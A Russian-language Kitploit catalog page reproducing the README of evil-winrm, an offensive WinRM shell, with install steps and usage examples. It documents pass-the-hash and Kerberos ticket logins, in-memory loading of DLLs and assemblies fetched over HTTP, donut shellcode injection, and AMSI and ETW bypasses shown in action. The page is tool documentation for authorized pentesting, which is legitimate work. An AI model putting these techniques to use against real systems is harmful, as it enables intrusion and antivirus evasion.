Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
evil-winrm — Лучшая оболочка WinRM для взлома/тестирования на проникновение | Kitploit
Инструменты/GitHubGitHub/hackplayers/evil-winrm
Генерация полезной нагрузкиЭксплуатацияПост-эксплуатацияТестирование на ПроникновениеАутентификацияИнструмент Удаленного Доступа
GitHubhackplayers/evil-winrm

evil-winrm

Лучшая оболочка WinRM для взлома/тестирования на проникновение

Репозиторий
5.4k6808 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Evil-WinRM ![Version-shield] ![Ruby2.3-shield] ![Gem-Version] ![License-shield] ![Docker-shield]

Лучшая оболочка WinRM для взлома/пентестинга

Banner

Описание и назначение

Эта оболочка является лучшей оболочкой WinRM для взлома/пентестинга.

WinRM (Windows Remote Management) — это реализация протокола WS-Management от Microsoft. Стандартный протокол на основе SOAP, который позволяет аппаратному и программному обеспечению от разных производителей взаимодействовать. Microsoft включила его в свои операционные системы, чтобы облегчить жизнь системным администраторам.

Эта программа может использоваться на любых серверах Microsoft Windows с включенной этой функцией (обычно на порту 5985), конечно, только если у вас есть учетные данные и разрешения. Таким образом, можно сказать, что она может использоваться на этапе пост-эксплуатации при взломе/пентестинге. Цель программы — предоставить удобные и простые в использовании функции для взлома. Она также может использоваться системными администраторами в законных целях, но большинство её функций ориентированы на взлом/пентестинг.

Она основана в основном на библиотеке WinRM Ruby, которая изменила способ работы с версии 2.0. Теперь вместо использования протокола WinRM она использует PSRP (Powershell Remoting Protocol) для инициализации пулов пространства выполнения, а также для создания и обработки конвейеров.

Возможности

  • Совместимость с клиентскими системами Linux и Windows
  • Загрузка в память скриптов PowerShell
  • Загрузка в память DLL-файлов, обходя некоторые антивирусы
  • Загрузка в память сборок C# (C Sharp), обходя некоторые антивирусы
  • Загрузка x64 полезных нагрузок, сгенерированных с помощью отличной техники [donut]
  • Динамический обход AMSI для избежания сигнатур антивирусов
  • Поддержка Pass-the-hash
  • Поддержка аутентификации Kerberos, включая файлы ccache и kirbi
  • Поддержка SSL и сертификатов
  • Загрузка и скачивание файлов с отображением прогресс-бара
  • Вывод списка служб удаленной машины без привилегий
  • История команд
  • Автодополнение команд WinRM
  • Автодополнение локальных файлов/каталогов
  • Автодополнение удаленных путей (файлов/каталогов) (можно отключить)
  • Цветовое оформление приглашения и выводимых сообщений (можно отключить)
  • Необязательная функция ведения журнала
  • Поддержка Docker (готовые образы доступны на [Dockerhub])
  • Перехват сигналов для предотвращения случайного выхода из оболочки при нажатии Ctrl+C
  • Настраиваемый User-Agent с использованием легитимного стандартного User-Agent Windows
  • Обход ETW (Event Tracing for Windows)

Справка```

Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-a USERAGENT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [-K TICKET_FILE] [--spn SPN_PREFIX] [-l] -S, --ssl Enable ssl -c, --pub-key PUBLIC_KEY_PATH Local path to public key certificate -k, --priv-key PRIVATE_KEY_PATH Local path to private key certificate -r, --realm DOMAIN Kerberos auth, it has to be set also in /etc/krb5.conf file using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com } -K, --ccache TICKET_FILE Path to Kerberos ticket file (ccache or kirbi format, auto-detected) -s, --scripts PS_SCRIPTS_PATH Powershell scripts local path --spn SPN_PREFIX SPN prefix for Kerberos auth (default HTTP) -e, --executables EXES_PATH C# executables local path -i, --ip IP Remote host IP or hostname. FQDN for Kerberos auth (required) -U, --url URL Remote url endpoint (default /wsman) -u, --user USER Username (required if not using kerberos) -p, --password PASS Password -H, --hash HASH NTHash -P, --port PORT Remote host port (default 5985) -a, --user-agent Specify connection user-agent (default Microsoft WinRM Client) -V, --version Show version -n, --no-colors Disable colors -N, --no-rpath-completion Disable remote path completion -l, --log Log the WinRM session -h, --help Display this help message

root@kitploit:~
## Требования
Требуется Ruby 2.3 или выше. Также необходимы некоторые гемы ruby: `winrm >=2.3.7`, `winrm-fs >=1.3.2`, `stringio >=0.0.2`, `logger >= 1.4.3`, `fileutils >= 0.7.2`.
В зависимости от выбранного метода установки (доступно 4) установка этих зависимостей может потребовать ручного выполнения.

Ещё одно важное требование, используемое только для аутентификации Kerberos, — установка пакета Kerberos для сетевой аутентификации.
Для некоторых дистрибутивов Linux, таких как Debian-based (Kali, Parrot и т.д.), он называется `krb5-user`. Для BlackArch он называется `krb5`, и для других дистрибутивов Linux он может называться иначе.

Функция автодополнения удалённых путей будет работать только в том случае, если ваш Ruby был скомпилирован с флагом `--with-readline-dir`. Эта опция включена по умолчанию в Ruby, включённом в некоторые дистрибутивы Linux, но не во все. См. [раздел ниже](#Remote-path-completion) для получения дополнительной информации.

## Установка и быстрый старт (4 метода)

### Метод 1. Установка непосредственно в виде гема ruby (зависимости будут установлены автоматически в вашей системе)
 - Шаг 1. Установите его (зависимости установятся автоматически): ```gem install evil-winrm```
 - Шаг 2. Готово. Просто запускайте!```
evil-winrm  -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

Метод 2. Клонирование Git и установка зависимостей вручную

  • Шаг 1. Установите зависимости вручную: sudo gem install winrm winrm-fs stringio logger fileutils
  • Шаг 2. Клонируйте репозиторий: git clone https://github.com/Hackplayers/evil-winrm.git
  • Шаг 3. Готово. Просто запустите!``` cd evil-winrm && ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
root@kitploit:~
### Метод 3. Использование bundler (зависимости не будут установлены в вашу систему, только для использования evil-winrm)
 - Шаг 1. Установите bundler: `gem install bundler`
 - Шаг 2. Склонируйте репозиторий: `git clone https://github.com/Hackplayers/evil-winrm.git`
 - Шаг 3. Установите зависимости с помощью bundler: `cd evil-winrm && bundle install --path vendor/bundle`
 - Шаг 4. Запустите его с помощью bundler:```
bundle exec evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

Метод 4. Использование Docker

  • Шаг 1. Запустите docker-контейнер на основе уже собранного образа:``` docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/ps1_scripts/' -e '/exe_files/'
root@kitploit:~
## Documentation

### Clear text password
Если вы не хотите указывать пароль в открытом виде, вы можете не использовать аргумент `-p`, и пароль будет запрошен без отображения на экране.

### Ipv6
Для использования IPv6 адрес должен быть добавлен в /etc/hosts. Просто укажите уже заданное имя хоста после аргумента `-i` вместо IP-адреса.

### Basic commands
 - **upload**: локальные файлы можно автодополнять с помощью клавиши Tab.
   - usage: `upload local_filename` or `upload local_filename destination_filename`
 - **download**:
   - usage: `download remote_filename` or `download remote_filename destination_filename`

 __Примечания о путях (загрузка/выгрузка)__:
   Относительные пути не разрешены для использования при загрузке/выгрузке. Используйте имена файлов в текущем каталоге или абсолютные пути.
   Если вы используете Evil-WinRM в среде Docker, имейте в виду, что все локальные пути должны находиться в `/data`, и убедитесь, что вы смонтировали его как том, чтобы иметь доступ к загруженным файлам или иметь возможность загружать файлы из вашей локальной ОС.

 - **services**: выводит список всех служб с указанием, есть ли у вашей учётной записи разрешения на каждую из них. Для использования этой функции не требуются права администратора.
 - **menu**: загружает функции `Invoke-Binary`, `Dll-Loader` и `Donut-Loader`, которые мы объясним ниже. Когда загружается ps1-файл, отображаются все его функции.
 - **clear** или **cls**: очищает экран терминала. Вы также можете использовать сочетание клавиш `Ctrl+L` для очистки экрана.```
*Evil-WinRM* PS C:\> menu

   ,.   (   .      )               "            ,.   (   .      )       .
  ("  (  )  )'     ,'             (     '    ("     )  )'     ,'   .  ,)
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /
        \/                               \/          \/       \/         \/

          By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers

[+] Dll-Loader
[+] Donut-Loader
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] clear
[+] cls
[+] menu
[+] exit

Загрузка скриптов PowerShell

  • Чтобы загрузить файл .ps1, достаточно ввести его имя (допускается автодополнение с помощью клавиши Tab). Скрипты должны находиться в пути, заданном аргументом -s. Снова введите menu и посмотрите загруженные функции. Очень большие файлы могут загружаться долго.``` Evil-WinRM PS C:> PowerView.ps1 Evil-WinRM PS C:> menu

    ,. ( . ) " ,. ( . ) . (" ( ) )' ,' ( ' (" ) )' ,' . ,) .; ) ' (( (" ) ;(, . ;) " )" .; ) ' (( (" ) );(, )(( ".,,.).,) (..( .), ) , (...( '.."., . '.)(..,(".) ( ') _ / _|| | (( ( / \ / _| _ \ /
    | __)
    \ / / | | ;
    )') \ // / |/ | / / \ /
    | \ /| | |
    /
    / \ /| | | \ | / Y
    /
    _____ / _/ |__|
    / _/\ / ||| /__| /__| / / / / / /

    root@kitploit:~
       By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
    

[+] Add-DomainAltSecurityIdentity [+] Add-DomainGroupMember [+] Add-DomainObjectAcl [+] Add-RemoteConnection [+] Add-Win32Type [+] Convert-ADName [+] Convert-DNSRecord [+] ConvertFrom-LDAPLogonHours [+] ConvertFrom-SID [+] ConvertFrom-UACValue [+] Convert-LDAPProperty [+] Convert-LogonHours [+] ConvertTo-SID [+] Dll-Loader [+] Donut-Loader [+] Export-PowerViewCSV [+] field [+] Find-DomainLocalGroupMember

root@kitploit:~
### Расширенные команды
- Invoke-Binary: позволяет выполнять сборки .Net в памяти. Имя может быть автодополнено с помощью клавиши Tab. Аргументы для exe-файла могут быть переданы через запятую. Пример: `Invoke-Binary /opt/csharp/Binary.exe 'param1, param2, param3'`. Исполняемые файлы должны находиться в пути, заданном аргументом `-e`.```
*Evil-WinRM* PS C:\> Invoke-Binary
.SYNOPSIS
    Execute binaries from memory.
    PowerShell Function: Invoke-Binary
    Author: Luis Vacas (CyberVaca)

    Required dependencies: None
    Optional dependencies: None
.DESCRIPTION

.EXAMPLE
    Invoke-Binary /opt/csharp/Watson.exe
    Invoke-Binary /opt/csharp/Binary.exe param1,param2,param3
    Invoke-Binary /opt/csharp/Binary.exe 'param1, param2, param3'
    Description
    -----------
    Function that execute binaries from memory.

*Evil-WinRM* PS C:\> Invoke-Binary /opt/csharp/Rubeus.exe

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.0


 Ticket requests and renewals:


  • Dll-Loader: позволяет загружать библиотеки dll в память, эквивалентно: [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("pwn.dll"))

    Файл dll может быть размещен через smb, http или локально. После загрузки введите menu, затем можно автодополнять все функции.``` Evil-WinRM PS C:> Dll-Loader .SYNOPSIS dll loader. PowerShell Function: Dll-Loader Author: Hector de Armas (3v4Si0N)

    Required dependencies: None Optional dependencies: None .DESCRIPTION . .EXAMPLE Dll-Loader -smb -path \192.168.139.132\share\myDll.dll Dll-Loader -local -path C:\Users\Pepito\Desktop\myDll.dll Dll-Loader -http -path http://example.com/myDll.dll

    Description

    Function that loads an arbitrary dll

Evil-WinRM PS C:> Dll-Loader -http http://10.10.10.10/SharpSploit.dll [+] Reading dll by HTTP [+] Loading dll... Evil-WinRM PS C:\Users\test\Documents> menu

[... Snip ...]

Evil-WinRM PS C:> [SharpSploit.Enumeration.Host]::GetProcessList()

Pid : 0 Ppid : 0 Name : Idle Path : SessionID : 0 Owner : Architecture : x64

root@kitploit:~
- Donut-Loader: позволяет внедрять x64 полезные нагрузки, сгенерированные с помощью замечательной техники [donut]. Нет необходимости кодировать payload.bin, просто сгенерируйте и внедряйте!```
*Evil-WinRM* PS C:\> Donut-Loader
.SYNOPSIS
    Donut Loader.
    PowerShell Function: Donut-Loader
    Author: Luis Vacas (CyberVaca)
    Based code: TheWover

    Required dependencies: None
    Optional dependencies: None
.DESCRIPTION

.EXAMPLE
    Donut-Loader -process_id 2195 -donutfile /home/cybervaca/donut.bin
    Donut-Loader -process_id (get-process notepad).id -donutfile /home/cybervaca/donut.bin

    Description
    -----------
    Function that loads an arbitrary donut :D

Вы можете использовать этот [donut-maker] для генерации payload.bin, если вы не используете Windows. Этот скрипт использует модуль Python, написанный Marcello Salvati ([byt3bl33d3r]). Его можно установить с помощью pip: `pip3 install donut-shellcode```` python3 donut-maker.py -i Covenant.exe


.'/,-Y" "-. l.Y ^. /\ __ Donuts! i /" "
| /" "\ o ! l ] o !
./ \ _ _ .
__./ "

X / \ _./ ( \ . ..--" ~-. Z,-- /
__. ( / ______) \ l /-----
" / Y \ / | "x
.^ |
j Y

[+] Donut generated successfully: payload.bin

root@kitploit:~
- Bypass-4MSI: патчит защиту AMSI.```
*Evil-WinRM* PS C:\> #amsiscanbuffer
At line:1 char:1
+ #amsiscanbuffer
+ ~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
*Evil-WinRM* PS C:\>
*Evil-WinRM* PS C:\> Bypass-4MSI
[+] Success!

*Evil-WinRM* PS C:\> #amsiscanbuffer
*Evil-WinRM* PS C:\>

Kerberos

  • Сначала нужно синхронизировать время с DC: rdate -n <dc_ip>

  • Существует несколько способов генерации билета:

    • Использование [ticketer.py] из impacket
    • Использование [Rubeus] или [Mimikatz] для получения билетов kirbi (поддерживается автоматическое преобразование в ccache)
  • Добавьте файл билета. Есть 3 способа:

    export KRB5CCNAME=/foo/var/ticket.ccache

    cp ticket.ccache /tmp/krb5cc_0

    Используйте параметр -K: evil-winrm -i hostname -r DOMAIN.COM -K /path/to/ticket.ccache или evil-winrm -i hostname -r DOMAIN.COM -K /path/to/ticket.kirbi

    При использовании -K инструмент автоматически:

    • Определяет формат билета (ccache или kirbi)
    • При необходимости преобразует билеты kirbi в формат ccache (требуется ticket_converter.py или impacket-ticketConverter)
    • Проверяет, существует ли файл и доступен ли для чтения
    • Устанавливает переменную окружения KRB5CCNAME
    • Преобразует IP-адреса в FQDN для лучшей совместимости с Kerberos
  • Добавьте realm в /etc/krb5.conf (для linux). Важно использовать следующий формат: ``` CONTOSO.COM = { kdc = fooserver.contoso.com }

Автодополнение удаленных путей

Эта функция может быть недоступна в зависимости от используемой вами версии ruby. Она должна быть скомпилирована с поддержкой readline. В противном случае эта функция не будет работать (будет показано предупреждение).

Метод 1 (скомпилировать необходимое расширение)

При использовании этого метода вы скомпилируете ruby с необходимой функцией readline, но будете использовать только библиотеку, не изменяя версию ruby по умолчанию в вашей системе. По этой причине это наиболее рекомендуемый метод.

Предположим, что в вашей системе на основе Debian у вас установлен ruby 2.7.3:```

Install needed package

apt install libreadline-dev

Check your ruby version

ruby --version ruby 2.7.3p183 (2021-04-05 revision 6847ee089d) [x86_64-linux-gnu]

Download ruby source code (2.7.3 in this case):

wget https://ftp.ruby-lang.org/pub/ruby/2.7/ruby-2.7.3.tar.gz

Extract source code

tar -xf ruby-2.7.3.tar.gz

Compile the readline extension:

cd ruby-2.7.3/ext/readline ruby ./extconf.rb make

Patch current version of the ruby readline extension:

sudo cp /usr/lib/x86_64-linux-gnu/ruby/2.7.0/readline.so /usr/lib/x86_64-linux-gnu/ruby/2.7.0/readline.so.bk sudo cp -f readline.so /usr/lib/x86_64-linux-gnu/ruby/2.7.0/readline.so

root@kitploit:~
#### Метод 2 (Установка ruby для использования только с evil-winrm с помощью rbenv)

Предположим, что вам нужен ruby 2.7.1 на дистрибутиве Linux на основе Debian, и вы используете zsh. Этот скрипт автоматизирует процесс. Вам нужно запустить его из той же директории, где находятся evil-winrm.rb и Gemfile (например, директория evil-winrm, созданная после git clone):```
#!/usr/bin/env zsh

# Uninstall possible current installed versions
sudo gem uninstall evil-winrm -q
gem uninstall evil-winrm -q

# Install rbenv
sudo apt install rbenv

# Config rbenv on zshrc config file
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.zshrc
echo 'eval "$(rbenv init -)"' >> ~/.zshrc
source ~/.zshrc

# Install ruby with readline support
export RUBY_CONFIGURE_OPTS=--with-readline-dir="/usr/include/readline"
rbenv install 2.7.1

# Create file '.ruby-version' to set right ruby version
rbenv local 2.7.1

# Install local gems
gem install bundler
bundle install

current_evwr="$(pwd)/evil-winrm.rb"

sudo bash -c "cat << 'EOF' > /usr/bin/evil-winrm
    #!/usr/bin/env sh
    "${current_evwr}" "\$@"
EOF"

sudo chmod +x /usr/bin/evil-winrm

Затем вы можете безопасно запустить evil-winrm, используя новый установленный ruby с необходимой поддержкой readline из любого места.

Метод 3 (скомпилировать весь ruby)

Если вы хотите скомпилировать его самостоятельно, вы можете выполнить следующие шаги. Предположим, что вам нужен ruby 2.7.3:``` wget -O ruby-install-0.8.1.tar.gz https://github.com/postmodern/ruby-install/archive/v0.8.1.tar.gz tar -xzvf ruby-install-0.8.1.tar.gz cd ruby-install-0.8.1/ sudo make install ruby-install ruby 2.7.3 -- --with-readline-dir=/usr/include/readline

root@kitploit:~
В зависимости от вашей системы он будет установлен в `/opt/rubies/ruby-2.7.3` или, возможно, в `~/.rubies/ruby-2.7.3`.

Теперь нужно установить зависимости evil-winrm для этой новой установленной версии Ruby. Самый простой способ — выполнить команду `/opt/rubies/ruby-2.7.3/bin/gem install evil-winrm`. Используемая команда gem должна принадлежать новой установке Ruby.

После этого вы можете безопасно запустить свою новую установку Ruby, чтобы использовать ее с evil-winrm: `/opt/rubies/ruby-2.7.3/bin/ruby ./evil-winrm.rb -h`

Рекомендуется использовать эту новую установку Ruby только для запуска evil-winrm. Если вы сделаете ее стандартной Ruby для вашей системы, имейте в виду, что в ней нет установленных зависимых гемов. Некоторое программное обеспечение на Ruby, такое как Metasploit или другие, может не запускаться корректно из-за проблем с зависимостями.

### Логирование

Эта функция создает файлы в вашем домашнем каталоге $HOME, сохраняя команды и выводы сеансов WinRM.

### История команд

Evil-WinRM сохраняет постоянную историю команд для каждой комбинации хоста и пользователя. История хранится в каталоге `~/.evil-winrm/history/` с файлами, названными как `{host}_{user}.hist`.

Когда вы подключаетесь к машине, к которой ранее уже обращались, вы можете использовать клавиши со стрелками (вверх/вниз) для навигации по предыдущим командам. История автоматически сохраняется после каждого выполнения команды и загружается при повторном подключении к тому же хосту с тем же пользователем.

### Известные проблемы. Ошибки OpenSSL

Иногда вы можете столкнуться с ошибкой, подобной этой:```
Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error

Ошибка вызвана тем, что OpenSSL версии 3.0 исключил некоторые устаревшие функции, такие как MD4, необходимые для работы этого инструмента. Существует несколько обходных путей для решения данной ситуации:

  • Обновите вашу систему до последней версии. Скорее всего, эта проблема была автоматически исправлена в последних версиях Ruby, использующих более новые версии OpenSSL.
  • Скомпилируйте собственный Ruby, используя старую версию OpenSSL 1.x вместо OpenSSL 3.0, или скомпилируйте его с OpenSSL > 3.0, чтобы избежать проблемной версии 3.0.
  • Самый простой способ. Отредактируйте файл конфигурации /etc/ssl/openssl.cnf и убедитесь, что конфигурация выглядит следующим образом:``` openssl_conf = openssl_init

[openssl_init] providers = provider_sect

[provider_sect] default = default_sect legacy = legacy_sect

[default_sect] activate = 1

[legacy_sect] activate = 1

root@kitploit:~
- В качестве альтернативы последнему обходному решению, если ваша система использует LibreSSL вместо OpenSSL или вы просто не хотите изменять системный конфигурационный файл. Создайте простой файл, содержащий указанное выше содержимое. Можно использовать любое имя, например `evil-tls.conf`. После этого экспортируйте переменную окружения, чтобы заставить систему использовать его: `export OPENSSL_CONF="/path/to/evil-tls.conf"`. Затем запустите инструмент, ошибка исчезнет.

## Список изменений:
Список изменений и изменения проекта можно проверить здесь: [CHANGELOG.md](https://raw.githubusercontent.com/Hackplayers/evil-winrm/master/CHANGELOG.md)

## Благодарности:
Команда:

 - [Cybervaca], (основатель). Twitter (X): [@CyberVaca_]
 - [OscarAkaElvis], Twitter (X): [@OscarAkaElvis]
 - [Jarilaos], Twitter (X): [@_Laox]
 - [arale61], Twitter (X): [@arale61]

Благодарности:

 - [Vis0r] за его личную поддержку.
 - [Alamot] за его оригинальный код.
 - [3v4Si0N] за его отличный загрузчик dll.
 - [WinRb] Все участники библиотеки ruby.
 - [TheWover] за его отличный инструмент donut.
 - [byt3bl33d3r] за его библиотеку на Python для создания полезных нагрузок donut.
 - [Sh11td0wn] за вдохновение по поводу новых функций.
 - [Borch] за его помощь в добавлении функции логирования.
 - [Hackplayers] за предоставление убежища на их GitHub для этого программного обеспечения.

## Отказ от ответственности и лицензия
Этот скрипт лицензирован под LGPLv3+. Прямая ссылка на [Лицензию](https://raw.githubusercontent.com/Hackplayers/evil-winrm/master/LICENSE).

Evil-WinRM должен использоваться только для авторизованного тестирования на проникновение и/или некоммерческих образовательных целей.
Любое неправомерное использование этого программного обеспечения не будет являться ответственностью автора или любого другого соавтора.
Используйте его на своих собственных серверах и/или с разрешения владельца сервера.

<!-- Github URLs -->
[Cybervaca]: https://github.com/cybervaca
[OscarAkaElvis]: https://github.com/OscarAkaElvis
[Jarilaos]: https://github.com/jarilaos
[arale61]: https://github.com/arale61
[Vis0r]: https://github.com/vmotos
[Alamot]: https://github.com/Alamot
[3v4Si0N]: https://github.com/3v4Si0N
[Borch]: https://github.com/Stoo0rmq
[donut]: https://github.com/TheWover/donut
[donut-maker]: https://raw.githubusercontent.com/Hackplayers/Salsa-tools/master/Donut-Maker/donut-maker.py
[byt3bl33d3r]: https://twitter.com/byt3bl33d3r
[WinRb]: https://github.com/WinRb/WinRM/graphs/contributors
[TheWover]: https://github.com/TheWover
[Sh11td0wn]: https://github.com/Sh11td0wn
[ticketer.py]: https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/ticketer.py
[ticket_converter.py]: https://github.com/Zer1t0/ticket_converter
[Rubeus]: https://github.com/GhostPack/Rubeus
[Mimikatz]: https://github.com/gentilkiwi/mimikatz
[cheatsheet]: https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
[Dockerhub]: https://hub.docker.com/r/oscarakaelvis/evil-winrm
[Hackplayers]: https://www.hackplayers.com/

<!-- Twitter URLs -->
[@CyberVaca_]: https://twitter.com/CyberVaca_
[@OscarAkaElvis]: https://twitter.com/OscarAkaElvis
[@_Laox]: https://twitter.com/_Laox
[@arale61]: https://twitter.com/arale61

<!-- Badges URLs -->
[Version-shield]: https://img.shields.io/badge/version-3.9-blue.svg?style=flat-square&colorA=273133&colorB=0093ee "Latest version"
[Ruby2.3-shield]: https://img.shields.io/badge/ruby-2.3+-blue.svg?style=flat-square&colorA=273133&colorB=ff0000 "Ruby 2.3 or later"
[License-shield]: https://img.shields.io/badge/license-LGPL%20v3+-blue.svg?style=flat-square&colorA=273133&colorB=bd0000 "LGPL v3+"
[Docker-shield]: https://img.shields.io/docker/automated/oscarakaelvis/evil-winrm.svg?style=flat-square&colorA=273133&colorB=a9a9a9 "Docker rules!"
[Gem-Version]: https://img.shields.io/gem/v/evil-winrm?style=flat-square&colorA=273133&colorB=46c249 "Ruby gem"
Скачать инструмент
root@kitploit:~
  • Проверка билетов Kerberos с помощью klist

  • Чтобы удалить билет, используйте: kdestroy

  • Для получения дополнительной информации о Kerberos ознакомьтесь с этим [cheatsheet]